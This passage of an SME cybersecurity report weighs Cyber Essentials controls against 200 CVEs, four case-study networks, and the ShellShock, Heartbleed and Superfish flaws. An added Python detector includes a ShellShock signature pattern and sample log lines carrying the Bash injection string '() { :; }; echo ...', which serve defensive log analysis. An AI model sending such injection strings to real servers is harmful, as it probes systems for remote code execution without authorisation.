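    "SME-3": Network("SME-3", frozenset({"Dell", "TP-Link"}),
                     frozenset({"OS X", "Windows 7", "Windows 8", "Adobe Flash Player"})),
    "SME-4": Network("SME-4", frozenset({"ExampleVendor"}),
                     frozenset({"Windows 8.1", "iOS"})),
}

if __name__ == "__main__":
    print("worst case:", summarise(SAMPLE_VULNS))
    for net in NETWORKS.values():
        print(net.name, summarise(SAMPLE_VULNS, net))
```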
Analysis

The analysis of the data collected has been split into sections. Firstly, each of the vulnerabilities has been assessed to ascertain its mitigation with and without the use of the Cyber Essentials controls; this supposes a case where any software or hardware source of a vulnerability is in use (i.e. a worst-case, fully inclusive assessment).

What follows is an analysis of the information gathered from interviews. Four SMEs from distinct industries are detailed in physical infrastructure and service usage, as well as current user access policies and existing security measures in place. A summary of the mitigation results for vulnerabilities in software and hardware used for each SME network configuration is included.

The full table for the applicability of all CVE vulnerabilities to each of the network structures can be found in the CVE Details section on page 19.

Finally, the data collected from the survey is analysed and used to develop a general-case network model; the SME networks are compared to this to better understand the nuances of each market sector, as well as the overall typical configuration of SMEs.
Full Vulnerabilities Assessment
Of the entire list of 200 vulnerabilities from 2013 and 2014 deemed applicable to the study and chosen for analysis, 131 vulnerabilities were mitigated with the use of the Cyber Essentials Security Tools, 61 vulnerabilities were partially mitigated and 8 were not mitigated.

Figure 4: Percentage of Full Vulnerabilities List Mitigated

Partially Mitigated: 59 of the 61 CVEs judged as partially mitigated are so because they rely on patches from third-party software or hardware vendors, but will be mitigated once a security fix has been released. Whatever level of security tools is deployed on a network, the security of third-party software unfortunately relies on the vendor's ability to identify potential areas of risk, as well as to respond quickly to security breaches as they become apparent, with the release of patches. All software installed on an SME network should be periodically reviewed to decide whether it is necessary - or if there are more suitable, and potentially more secure, solutions available.

The other two partially mitigated vulnerabilities rely on website blacklisting combined with avoiding vulnerable web browser software. A secure configuration without such a browser would mitigate these vulnerabilities, but, as in the Web Development SME case study, it may not always be possible to avoid the use of a specific piece of software. In such a case, website blacklisting is the only defence against the vulnerabilities.

Not Mitigated - Secure Configuration: Some vulnerabilities have been found to be unmitigatable using the CE controls; in each of the cases found, this is due to inherent flaws in a hardware device or software that cannot be fixed by a security patch or firmware update.

For these devices that are fundamentally flawed from a cyber-security standpoint, it can be that no level of security tools on top of the network can aid in mitigation - rather, the hardware should be replaced to ensure network security. It may be possible for a public list of all such devices to be developed as part of the government cyber-security scheme, to serve as a device-blacklist for SMEs.
Case Studies
Four SMEs were interviewed to build paper-models upon which the Cyber Essentials controls may be assessed. Some detail on the physical structure, usage and existing security of each network is provided.

• SME Network One represents a finance specialist SME using a combination of externally managed services for banking, in addition to internal, remotely accessible services for employees.
• SME Network Two represents a specialist SME utilising an off-site, remotely managed server for administrator services and cloud-based services for employees.
• SME Network Three represents a web services SME that accesses client servers frequently and utilises cloud-based services daily.
• SME Network Four represents a hospitality services provider with a very small company network co-located with a very large guest network component, where all of the services are remotely managed and located.
SME Network One - Finance Sector
Physical Infrastructure: The company interviewed comprised around 20 employees located at 3 sites nationally.

Remote workers connect over normal internet connections, both residential and commercial, and use both VPN and non-VPN traffic (specifically web traffic on port 80) to access services supplied by the company.

Figure 5: SME-1 Network

The hardware at the head office (where the interview was carried out) consists of equipment by 3Com, Draytek, BT and Huawei for infrastructure components. Employees use a range of machines bought between 2011 and 2014, comprising a mix of Dell and Lenovo PCs.

As most of the infrastructure is passive (most of the traffic is handled by a single 3Com BaseT-1000 switch), the firmware on the equipment is unchanged from purchase, if any firmware is present at all.

Services: At the head office site a Windows file server (Samba) provides local file sharing and allows remote users to access the same files via VPN. The mail server, a Microsoft Exchange Server, is an off-site deployment managed by an external company, but is a dedicated server for only this company.

Additionally, a web service and database server is run from a server at the site. This provides both local HTTP access to the database it runs, as well as having firewall rules put in place to allow external access to the same system for off-site employees.

Numerous other pieces of banking software are run on bank-owned remote servers and are accessed and secured via combinations of smart cards and PIN entry devices, also supplied by the banks.
User Access: Employees are permitted to access the internet from both their individual workstations and additional devices such as smart phones (although technically this is not permitted by policy, the policy is not strictly enforced). Internet access is, however, slightly filtered, with access to Facebook being blocked by the router.

Access logs for any network operations are not created, and any machine in the office can access the network, with no isolated islands.

User accounts can be migrated between machines via a Domain Controller, but in practice this is unlikely to actually happen, with users generally using their own machines.

Operating systems: Locally everything is Windows 7; the remote site uses Windows 7; 2 remote machines are Windows 8.1.

Mitigation of applicable vulnerabilities: Of the 200 listed vulnerabilities, 119 were applicable to the first SME network.

Figure 6: SME-1 Vulnerability Mitigation

Because much of this SME's operations are done via browser-based interfaces to other financial companies (such as banks), it places them in the firing line for a large number of the browser-based attacks. Furthermore, as some banks require specific browser versions for their interfaces to work, they end up with several different browsers, with several versions of each, to cover all their requirements, opening them up multiple times to browser-based vectors.

Additionally, the heavy use of SSL-based communication places them in a position where any SSL vulnerabilities affect them too.
SME Network Two - Specialist Group
Physical Infrastructure: The second SME participant employs 20-25 people based across multiple offices in one building.

Employees may bring their own devices or use a workstation provided. Workstations are connected to one of four switches via Ethernet and share a virtual LAN with other employee devices. An off-site server containing sensitive data is accessible only to administrators via SSH.

Network equipment includes an external Dell PowerEdge Server, four TP-Link switch access points and a TP-Link DHCP router.

Figure 7: SME-2 Network

Services: Employee devices sharing the network can use Windows Folder Sharing. Employee devices include the OSs OS X, Windows XP, Windows 7 & Windows 8, with auto-updates enabled.

Some employees use a VPN to connect to another network for a data service. All other services are provided by cloud servers via HTTPS: email, files & database, as well as management tools; these are used daily.

User Access: Employees have no restriction on their internet access and may use their own equipment. Administrators often access a remote server database and file store acting as a web server. Guests may access a separate Wi-Fi network through the same access points as other office workers, but do not share the same virtual LAN as employees. Wi-Fi access logs are gathered, but no other user activity. Employees can access the network from any machine, but the SME's policy is that all machines should have anti-malware and strong passwords, which are recommended to be changed periodically, with the employee machines configured to automatically lock after a period of inactivity.

Mitigation of applicable vulnerabilities: Of the 200 listed vulnerabilities, 79 were applicable to the second SME network.

Figure 8: SME-2 Vulnerability Mitigation

The specialist SME had the fewest overall potential vulnerabilities, largely owing to a higher reliance on cloud-based services. Although this reduces the risk from inherent vulnerability in a network, responsibility is handed on to the service provider chosen. A certified and reputable cloud services provider should thus be sought to ensure protection through the entire chain.
SME Network Three - Web Development
Physical Infrastructure: SME-3 employs 10 workers based in one building.

Employees are restricted from using their own devices unless validated by the company head - in which case no others may share that device. Workstations are connected to one switch via Ethernet and share a virtual LAN with other employee devices.

Network equipment includes an external Dell PowerEdge Server, one TP-Link switch access point and a TP-Link DHCP router.

Figure 9: SME-3 Network

Services: Employee devices sharing the network can use Windows Folder Sharing. Employee devices include the OSs OS X, Windows 7 & Windows 8, with auto-updates enabled.

All services are provided by cloud servers via HTTPS: email, files & database, as well as management tools; these are used daily.

User Access: Employees have no restriction on their internet access and commonly use all major browsers for compatibility testing.
Guests are not permitted on the network, but may join a 'guest' network through the same access points with a mobile device. Wi-Fi logs and cloud service access logs are gathered and actively monitored. Employees can access the network from a validated machine, but the SME's policy is that all machines should have anti-malware and strong passwords, which are recommended to be changed periodically, with the employee machines configured to automatically lock after a period of inactivity.
Mitigation of applicable vulnerabilities: Of the 200 listed vulnerabilities, 116 were applicable to the third SME network.

Figure 10: SME-3 Vulnerability Mitigation

The requirement for web development SMEs to operate across multiple web browsers, on various versions, to test and build a customer's website means that the network accumulates all vulnerabilities in web browsers. As this is a specialist case, a recommendation for web development organisations could be to use one up-to-date browser for general use. A bespoke policy may then be put in place.

When working on alternative browsers, employees should only access client pages where the developer has control of the web content.
SME Network Four - Hotel Services
Figure 11: SME-4 Network

Physical Infrastructure: This company is located at a single site and has equipment composed of a single desktop PC and 2 company laptops running on an ADSL router - this same router also provides the internet connection for the guests. An alternative router is available as a manual fall-back connection to the internet, but is available only to company equipment.

The guest network is split from the office network through secondary access point names, filtering traffic into a separate VLAN internal to the router.

Services: No local servers are present to provide any service to employees or guests on the network.

File storage is provided through online services, including Dropbox and SkyDrive. A standalone web server, owned and managed externally, runs the company website, and bookings are managed via a globally accessible website.

All the services are accessed with SSL-secured connections (HTTPS mainly).

User Access: User access is not mediated in any way, and any site can be accessed from any computer. Guests have no restrictions placed on their network usage either.

Operating systems: The company uses iOS for their mobile devices and Windows 8.1 for the office desktop and laptop PCs. Guests can bring their own equipment, so will be a mix of all operating systems currently available, including Windows, Linux, Mac and others.

Existing Security Measures: Beyond the router's separation between the guest and office networks, no other network security measures are in place. The office PCs do have automatic patch installation configured, however, and have the Kaspersky antivirus suite installed.

Mitigation of applicable vulnerabilities: Of the 200 listed vulnerabilities, 103 were applicable to the fourth SME network.

Figure 12: SME-4 Vulnerability Mitigation

Similarly to SME 1, SME 4 requires the use of web browsers for bookings and reception of guests, so enables a wide variety of attack vectors through the web.

Thankfully, the services and servers they connect to are run by larger corporations, which will hopefully have implemented at least Cyber Essentials-grade security and protection, so the actual risks should be minimal.

For the purposes of this report, however, we assume that if this company has not implemented Cyber Essentials then the services they use must also not have, leaving them open to attack.
Survey Responses
Data gathered from survey responses affords a much broader look at the typical network deployments and practice in SMEs. The full results from 17 participants may be found in the Survey Responses section on page 27.

Physical Infrastructure: The majority of respondents belong to SMEs with 0-9 workstations on site; this is related to the size of an organisation, and could be considered representative of businesses across the UK.

Services: Local - File, email, database and domain servers are the most common local service providers, all present in more than a third of SMEs. Remote - Email, web hosting and file-sharing are the most common services provided remotely.

User Access: More than half of SMEs permit employees' own devices to be used in the workplace. For organisations such as these it is important to ensure that employee machines receive the same level of protection as the rest of the work network, as one vulnerable machine allows vulnerability into the whole company.

Existing Security Measures: Of the survey respondents, most SMEs have a firewall, password policy and data-loss prevention scheme in place. These are the most common security measures in place for the SMEs contacted; below this is access control, malware protection and finally patch management, which is present in a little over half of organisations.

Almost two-thirds of survey participants were previously aware of Cyber Essentials.

Survey Respondents Network

The network built from survey respondents' data considers the overall response in order to build a network easily adaptable to match that of the majority of SME network configurations.

Locally, email and file servers have been represented, with domain controller capabilities represented in a network ADSL router. Remotely, a web server is depicted, but remote services may also include database usage, email and other web services.
Figure 13: Adaptable Survey-Response Network
Typicality of Case-Study SMEs
Within the survey respondents' network, aspects of each of the interviewed SME networks are apparent.

The Finance SME network shares a local file server, as sensitive information needs to be kept and processed by the organisation. Any SME handling sensitive information will be likely to strongly consider using local file servers.

The Specialist SME shares with the survey respondents' data its use of SSH to connect remotely to services. SSH is an important tool for accessing sensitive data while at home, or data that is stored remotely from the workplace.

The Web Development SME requires employees to connect to many web servers remotely; the survey respondents match this case with the use of external web-hosting services. That being said, in the general case this server is more likely to be the SME's own web-hosting solution rather than a client's.

The Hotel Services SME represents a very basic local network, using only cloud-based services remotely. This is becoming an increasingly popular trend for SMEs, as cloud services are often easier to set up and cheaper to maintain. This is also representative of many SMEs with little-to-no online presence.
Analysis of Cyber Essentials on High Profile Vulnerabilities

The following sections detail three of the high-profile vulnerabilities to hit the popular media in late 2014 to early 2015. These are of particular note as, while they may not be the most damaging of attack vectors (although some are very serious), they have caught the attention of the public, and SMEs would be under pressure to ensure that they were protected.

With this in mind, we analyse how effective the Cyber Essentials security controls are at tackling these high-profile vulnerabilities.
"ShellShock"

Also known by the name "BashDoor", Shellshock hit the news as it attacked the Linux server environment, and did so in a particularly effective manner.

GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock". NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.

CVE-2014-6271[13]

The exploit allowed attackers to directly execute arbitrary shell commands on a compromised system by altering environment variables. However, the bug was not enough by itself to actually enable attackers to compromise a system, but allowed access via other services. While the exploit is only effective if the Bash environment can be altered, the results can be devastating, as it lays bare the entire system to many other forms of attack.

The threat was particularly insidious for SMEs who used Linux/Unix based servers for services, mail servers as an example, as they would potentially have no idea that they had been compromised.
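For the mod_cgi vector named in the CVE text above, the practical question for an SME is whether probe attempts can be seen in the web server's own logs. The following detection logic, an added example and not part of the report, parses Apache "combined" access-log lines and flags logged headers that begin with the Bash function-definition marker; the log lines are constructed samples with inert payloads.

```python
"""Added example (not from the report): detection of ShellShock probe
attempts in Apache "combined" access logs, run here over constructed lines.

Apache copies request headers into a CGI script's environment (User-Agent
becomes HTTP_USER_AGENT, Referer becomes HTTP_REFERER, and so on), and a
vulnerable Bash treats any environment value that begins with "() {" as a
function definition and runs whatever trails it. That literal prefix in a
logged header is therefore the signature worth alerting on."""
import re
from typing import Dict, List, Optional

# host ident user [time] "request" status bytes "referer" "user-agent"
COMBINED = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
SIGNATURE = re.compile(r"\(\)\s*\{")      # tolerate "(){" and "() {" spacing

# Header fields that Apache exports into the CGI environment and that the
# combined log format retains.
HEADER_FIELDS = ("referer", "agent")


def parse_combined(line: str) -> Optional[Dict[str, str]]:
    """Parse one combined-format line; None if it does not match."""
    match = COMBINED.match(line.strip())
    return match.groupdict() if match else None


def find_shellshock(lines) -> List[Dict[str, str]]:
    """Return one finding per line whose logged headers carry the signature.

    Bash only interprets a value that *starts* with "() {", so a match at the
    start of a header is "high" confidence; a match elsewhere is "low" but
    still worth triage, as headers the log does not keep may carry the real one.
    """
    findings = []
    for number, line in enumerate(lines, start=1):
        record = parse_combined(line)
        if record is None:
            continue
        for field in HEADER_FIELDS:
            match = SIGNATURE.search(record[field])
            if match:
                findings.append({
                    "line": number,
                    "host": record["host"],
                    "field": field,
                    "request": record["request"],
                    "confidence": "high" if match.start() == 0 else "low",
                })
                break           # one finding per line is enough for triage
    return findings


# Constructed sample log (RFC 5737 documentation addresses; inert payloads).
SAMPLE_LOG = [
    '203.0.113.5 - - [25/Sep/2014:10:12:01 +0100] "GET /cgi-bin/status.cgi HTTP/1.1" '
    '200 512 "-" "() { :; }; echo shellshock-probe"',
    '198.51.100.7 - - [25/Sep/2014:10:12:05 +0100] "GET /index.html HTTP/1.1" '
    '200 3021 "-" "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"',
    '203.0.113.5 - - [25/Sep/2014:10:13:44 +0100] "GET /cgi-bin/status.cgi HTTP/1.1" '
    '200 512 "() { :; }; echo shellshock-probe" "curl/7.37.0"',
    # URL-encoded "() {" in the query string: Apache exports QUERY_STRING raw,
    # and it does not begin with the marker, so this is a true negative.
    '192.0.2.9 - - [25/Sep/2014:10:15:00 +0100] "GET /docs/functions.html?q=%28%29%20%7B HTTP/1.1" '
    '200 99 "-" "Wget/1.15"',
    '192.0.2.9 - - [25/Sep/2014:10:16:30 +0100] "GET /cgi-bin/status.cgi HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0 () { :; }; echo shellshock-probe"',
]

if __name__ == "__main__":
    for finding in find_shellshock(SAMPLE_LOG):
        print(finding)
```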
"Heartbleed"

Appearing in April 2014, the "Heartbleed" bug in OpenSSL allowed attackers to directly read the active memory of a target machine through a buffer over-read. This then allowed attackers to access private credentials (or indeed anything else) in the RAM of the target.

As described in the original CVE report:

The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.

Original CVE description[12]

As OpenSSL is a core part of many applications and services, both in the open and closed source world, this vulnerability had the potential to damage a huge number of systems. At the time of release, various sources (including, for example, Netcraft[15]) reported that up to 17% of trusted SSL-certified servers were vulnerable to the attack.

Depending on how the SME in question operates, the threat this particular CVE posed (and indeed still poses, with as-yet-unupdated servers still online with the vulnerability) is difficult to discern. Obviously the vulnerability is serious, but the ability of individual SMEs to detect and correct this flaw will vary greatly depending on the individual deployments.

Larger companies with their own Linux/Unix servers may have been able to deploy the patched OpenSSL version as soon as the patch was available, but smaller businesses, or those with more cloud-based services, may not have access to the software running on the servers they use and may be at the mercy of the respective operators to implement the fix. Because of this, patch management only partially remedies this vulnerability, and other protection methods from the Cyber Essentials guidelines, such as securing configurations or controlling access, will have unknown effects.

It is vulnerabilities such as this that pose the greatest threat to SME networks, as the methods to fix the issue are often outside the control of the company, potentially leaving them vulnerable far longer than one would expect.
"Superfish"

The SDK for Komodia Redirector with SSL Digestor, as used in Lavasoft Ad-Aware Web Companion 1.1.885.1766 and Ad-Aware AdBlocker (alpha) 1.3.69.1, Qustodio for Windows, Atom Security Inc. StaffCop 5.8, and other products, uses the same X.509 certificate private key for a root CA certificate across different customers' installations, which makes it easier for man-in-the-middle attackers to spoof SSL servers by leveraging knowledge of this key, as originally reported for Superfish VisualDiscovery on certain Lenovo Notebook laptop products.

Original CVE description[14]

This vulnerability is particularly interesting as the software causing the issue was effectively brokered by a trusted hardware vendor, namely Lenovo. Because the issue was part of the 'normal configuration' for the equipment, it remained undetected for a long time, and hints that there may be further breaches in security as yet undiscovered in both Lenovo's and other manufacturers' equipment.

The vector is through the SuperFish software essentially breaking the chain of trust for SSL certificates by installing a self-signing certificate into the list of trusted certificates on the host machine. This allows an attacker to simply sign their own code via the same certificate, which itself can be easily gathered from any other machine running SuperFish, and they have full access to any SSL-secured connection from the target machine.

Thankfully, while the risks to users and SMEs were high, the fix is a simple one-time run of a removal tool provided by Lenovo themselves[11], and is mitigated fully through the Cyber Essentials patch management advice.
Threat Analysis
ShellShock: Without Cyber Essentials in place, SMEs 1 and 2 would be at risk from 'Shellshock', as they both operate Unix/Linux based systems that would require patching to plug the security issue. The extent to which SMEs 3 and 4 are vulnerable to this issue is unclear, as their large dependency on outside service providers leaves them in a position where they are both unable to determine their vulnerability and additionally unable to remedy it.

With Cyber Essentials, SMEs 1 and 2 would be fully protected, and it is likely that SMEs 3 and 4 are also protected if the external providers also use Cyber Essentials or other security and patching schemes.

Heartbleed: The 'Heartbleed' bug is another vulnerability that, without Cyber Essentials guidelines being followed, would have laid companies' external-facing services open to malicious attackers.

In all cases, however, each SME can be fully protected with a combination of patch management, firewalling and application of access controls from the Cyber Essentials guidelines.

SuperFish: All of the SMEs we interviewed could be exceedingly vulnerable to the 'Superfish' issue without Cyber Essentials, as much of their operations revolve around SSL-encrypted communications. A break in the chain of trust for their certificates would allow an attacker to man-in-the-middle their communications.

Normal system updates would have failed to remedy the situation, as the fix provided by Lenovo consisted of a tool to be run in addition to the normal operating system patches. It is further debatable how effective Cyber Essentials patch management would have been in plugging this vulnerability, as it would require that the administrators be aware of the issue and know of the patch, rather than simply following 'normal' patching guidelines. Assuming that the persons responsible for the equipment are aware of the issue, however, then Cyber Essentials patch management fully mitigates this issue.
Conclusions

The Cyber Essentials Security Tools have been shown to mitigate, or to mitigate as soon as a patch is released, all vulnerabilities from remote attackers that do not exploit fundamentally insecure software or hardware. Of the two hundred vulnerabilities collected, eight exploits were not able to be resolved with the deployment of security patches; for vulnerabilities such as these the only mitigation available is simply not to install the compromised systems. To help prevent deployments being susceptible to attacks on faulty systems, it may be recommended that a blacklist of such items is composed for public reference.
Scope. It is important to consider that the scope of this study covers only internet-based, commodity-level attacks, and although the Cyber Essentials tools perform very well in mitigating these, this does not represent full security. There is an increasingly identified risk from insiders that also requires attention, not least from malicious acts but also from users unknowingly compromising security.

The SMEs interviewed represent organisations from a range of market sectors: web development and online presence, specialist scientific services, the hospitality industry and finance.
Additional Tools
The 10 Steps to Cyber Security [2] identifies additional security measures that support the Cyber Essentials Scheme well, delivering additional security through indirect measures such as User Education and Awareness along with Network and Systems Monitoring. These additional measures would serve to bolster cyber security by fortifying each employee of the SME with the necessary knowledge of safe practice, its importance and some basic technical understanding, just as they may be versed in environmental awareness. Network and Systems Monitoring allows remote user logins, as well as file access and activity, to be logged. For very small networks this may currently be infeasible, as the extra manpower or finances required for such a system are costly. However, for larger organisations additional monitoring capability should be explored as a future extension to Cyber Essentials, not just to identify and mitigate malicious action for more bespoke and sophisticated attacks than those reported on, but also to aid in providing evidence for any potential cyber-crime investigations.
There exist some collective approaches to improving cyber-security; a notable example is the Cyber-security Information Sharing Partnership (CiSP) [4]. The partnership aims to benefit all members by providing real-time updates on issues of cyber-security and discovered vulnerabilities, as well as best-practice guides and other cyber-threat information. It would be beneficial for more organisations to belong to cyber-security collectives like this, creating networks of informed individuals working together to tackle cyber-crime. This would be particularly useful to quickly identify potential vulnerabilities and possible patches, which, as shown in this report, is critical for the CE patch management security control to fully mitigate related vulnerabilities.
An important note to be made is toward the security of business affiliates and service providers. Even if an SME has Cyber Essentials in place, any use of cloud services relies on the vendor's security controls for threat mitigation. In other words, cloud email, accounting and any other cloud-based or remote services are only as secure as the service provider makes them. In general, cloud providers should be holding their security practice to a high level of scrutiny and should be encouraged to certify their protection. Hewlett-Packard (HP) has taken this further and has begun to strengthen its entire supply chain (600 SMEs) with the Cyber Essentials accreditation. This provides protection across the entirety of Hewlett-Packard's operations as well as its affiliates. This should be a goal for organisations of all sizes, minimising the risk from cyber-threats by ensuring all trading partners uphold the same high levels of security.
Cyber Essentials Controls
Of the five current Cyber Essentials controls, Patch Management was considered to aid in the mitigation of the highest proportion of remote attacks (87.5%); counter-intuitively, the survey responses had patch management ranked last in use for SMEs. The controls most used currently could be seen as those providing the most intuitive or easily understood protection: data loss prevention, strong passwords and firewall. Patch management, by contrast, is not necessarily understood by individuals as a tool that greatly improves cyber-security.

Anti-Malware was useful in mitigating the fewest vulnerabilities (10%). It is, however, important to note that Anti-Malware is largely the only security tool that may routinely scan the network hardware and software, as well as any items downloaded from the internet or received as email attachments. This serves as a last line of defence and as such is vital to an organisation's cyber-safety.
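The proportions quoted in this section, and the eight unresolved vulnerabilities counted in the Conclusions, are both aggregations over the Cyber Controls Applicability table in the appendix (one row per CVE: the four SME applicability flags, the idealised-network flag, the outcome without Cyber Essentials, and the outcome with it naming the controls that apply). The script below is an added example written for this edit, not code from the report or its authors: it parses rows in that layout, computes the share of vulnerabilities each control helps mitigate, tallies the with-CE outcomes, lists the CVEs left unmitigated, and counts how many vulnerabilities apply to each network. The eight embedded rows are a constructed sample copied from the appendix table; the pipe-separated layout, and the folding of qualifiers such as "(Secure Browser)" into the base control name, are this example's own choices.

```python
"""Aggregate a Cyber Controls Applicability table (one row per CVE).

Added example, not the report's own code. Row layout mirrors the appendix:
CVE | SME 1 | SME 2 | SME 3 | SME 4 | Idealised | No CE | With CE
where the With CE cell is '<status> - <controls>'.
"""
import re
from collections import Counter

# Constructed sample: eight rows copied from the appendix table (the full
# table has 200 rows); the pipe-separated layout is this example's assumption.
SAMPLE_TABLE = """\
CVE-2013-0008 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration (User Policy), Anti-Malware
CVE-2013-0022 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0140 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0199 | y | n | n | n | n | Not Mitigated | Mitigated - Patch Management & Secure Configuration
CVE-2013-1140 | n | n | n | n | n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2014-0160 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-1477 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-4114 | y | y | y | y | n | Not Mitigated | Mitigated - Anti-Malware
"""

NETWORKS = ("SME 1", "SME 2", "SME 3", "SME 4", "Idealised")


def split_controls(text):
    """Reduce 'Firewall & Patch Management (x) [y]' to base control names.

    Qualifiers in () or [] are dropped so that, for example, 'Secure
    Configuration (Secure Browser)' and 'Secure Configuration (User Policy)'
    count as the same control (this example's own normalisation).
    """
    text = re.sub(r"\s*[\(\[][^\)\]]*[\)\]]", "", text)
    return [c.strip() for c in re.split(r"[,&]", text) if c.strip()]


def parse_row(line):
    """Parse one pipe-separated table row into a dict."""
    cells = [c.strip() for c in line.split("|")]
    if len(cells) != 8:
        raise ValueError(f"expected 8 cells, got {len(cells)}: {line!r}")
    cve, *flags, no_ce, with_ce = cells
    status, _, controls = with_ce.partition(" - ")
    return {
        "cve": cve,
        "applies": {net: flag.lower() == "y" for net, flag in zip(NETWORKS, flags)},
        "no_ce": no_ce,
        "with_ce": status.strip(),
        "controls": split_controls(controls),
    }


def load_table(text):
    return [parse_row(line) for line in text.splitlines() if line.strip()]


def control_coverage(rows):
    """Percentage of rows whose with-CE outcome names each control."""
    named = Counter()
    for row in rows:
        named.update(set(row["controls"]))  # count a control once per CVE
    return {ctrl: round(100.0 * n / len(rows), 1) for ctrl, n in named.items()}


def outcome_counts(rows):
    """How many CVEs end up Mitigated / Partially Mitigated / Not Mitigated with CE."""
    return Counter(row["with_ce"] for row in rows)


def unmitigated_with_ce(rows):
    """CVEs the controls cannot resolve (the report's 'do not install' cases)."""
    return [row["cve"] for row in rows if row["with_ce"] == "Not Mitigated"]


def exposure_by_network(rows):
    """Number of CVEs that apply to each network's installed software."""
    return {net: sum(row["applies"][net] for row in rows) for net in NETWORKS}


if __name__ == "__main__":
    rows = load_table(SAMPLE_TABLE)
    for ctrl, pct in sorted(control_coverage(rows).items(), key=lambda kv: -kv[1]):
        print(f"{ctrl:<22} {pct:5.1f}%")
    print(dict(outcome_counts(rows)))
    print("unmitigated with CE:", unmitigated_with_ce(rows))
    print(exposure_by_network(rows))
```

Run against the complete appendix table saved in the same layout, this is the kind of aggregation behind the figures quoted above; the exact percentages depend on choices the report does not spell out, such as whether a control named only in a "Partially Mitigated" outcome is counted, and whether qualified entries are folded into their base control as done here.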
Recommendations
To further improve cyber-security across the UK, we recommend that:

1. Collective approaches to cyber security should be further encouraged. In particular, a governmental/collective approach to identifying inherently flawed products should be developed. This could be in addition to, or as an extension of, current initiatives like CiSP, which can make a difference in detecting and reacting to potential vulnerabilities in a timely manner.

2. Further research into the mitigation of other cyber-threats is carried out, to explore the risk from insider threats and targeted attacks.

3. Further employee education is strongly encouraged, especially to be able to tackle the other types of attack mentioned above, which were not within the scope of this report.
References

[1] Centre for the Protection of National Infrastructure, CESG, Cabinet Office, Department for Business, Innovation and Skills. Cyber security guidance for business. https://www.gov.uk/government/publications/cyber-risk-management-a-board-level-responsibility, September 2012.

[2] Centre for the Protection of National Infrastructure, CESG, Cabinet Office, Department for Business, Innovation & Skills. 10 steps to cyber security. https://www.gov.uk/government/publications/cyber-risk-management-a-board-level-responsibility, September 2012.

[3] CESG, UK Trade & Investment, Prime Minister's Office, 10 Downing Street, Centre for the Protection of National Infrastructure, Government Communications Headquarters, Department for Business, Innovation and Skills. Cyber security boost for UK firms. https://www.gov.uk/government/news/cyber-security-boost-for-uk-firms, January 2015.

[4] Centre for the Protection of National Infrastructure, CiSP, CERT-UK, Department for Business, Innovation & Skills. Cyber-security Information Sharing Partnership (CiSP). https://www.cert.gov.uk/cisp/, March 2013.

[5] CREST. Cyber Essentials certified companies. http://www.cyberessentials.org/list/, March 2015.

[6] CVE.Mitre.org. Terminology - mitre.org. http://cve.mitre.org/about/terminology.html.

[7] Cyber Essentials. Cyber Essentials scheme - overview. https://www.gov.uk/government/publications/cyber-essentials-scheme-overview.

[8] CESG, Cabinet Office, Centre for the Protection of National Infrastructure, Department for Business, Innovation & Skills. Common cyber attacks: Reducing the impact. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/400106/Common_Cyber_Attacks-Reducing_The_Impact.pdf, January 2015.

[9] UK Cyber Security Forum. North West cyber security cluster. http://www.ukcybersecurityforum.com/index.php/cyber-security-clusters/north-west-‘-cluster, 2015.

[10] HM Government. Cyber Essentials certified companies. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/400914/bis-15-72-cyber-essentials-scheme-assurance-framework.pdf, January 2015.

[11] Lenovo. Superfish uninstall instructions. http://support.lenovo.com/us/en/product_security/superfish_uninstall.

[12] Mitre.org. CVE-2014-0160 aka Heartbleed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160, 2014.

[13] Mitre.org. CVE-2014-6271 aka Shellshock. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271, 2014.

[14] Mitre.org. CVE-2015-2077 aka Superfish. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2077, 2015.

[15] Netcraft. Half a million widely trusted websites vulnerable to Heartbleed bug. http://news.netcraft.com/archives/2014/04/08/half-a-million-widely-trusted-websites-vulnerable-to-heartbleed-bug.html, April 2014.

[16] Cabinet Office. The UK cyber security strategy - protecting and promoting the UK in a digital world. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/60961/uk-cyber-security-strategy-final.pdf, November 2011.

[17] Cabinet Office and The Rt Hon Francis Maude MP. Government mandates new cyber security standard for suppliers. https://www.gov.uk/government/news/government-mandates-new-cyber-security-standard-for-suppliers, September 2014.
Cyber Controls Applicability

CVE | SME 1 | SME 2 | SME 3 | SME 4 | Idealised | No CE | With CE
CVE-2013-0008 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Secure Configuration (User Policy), Anti-Malware
CVE-2013-0022 | y | n | y | y | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0084 | y | y | y | n | y | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0140 | y | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
